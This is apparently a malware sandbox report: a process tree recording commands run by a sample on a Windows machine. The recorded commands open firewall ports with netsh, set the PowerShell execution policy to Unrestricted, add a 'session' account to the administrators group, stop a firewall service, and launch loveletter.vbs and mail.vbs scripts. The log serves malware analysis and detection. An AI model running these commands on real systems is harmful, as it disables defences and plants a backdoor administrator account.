C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:1512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3600
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:1424
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:1248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:3856
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:1972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:5024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:2488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:60
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3592
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:1904
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"2⤵PID:5024
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"2⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y1⤵PID:2960
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:2148
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4636
Network
MITRE ATT&CK Enterprise v6
Downloads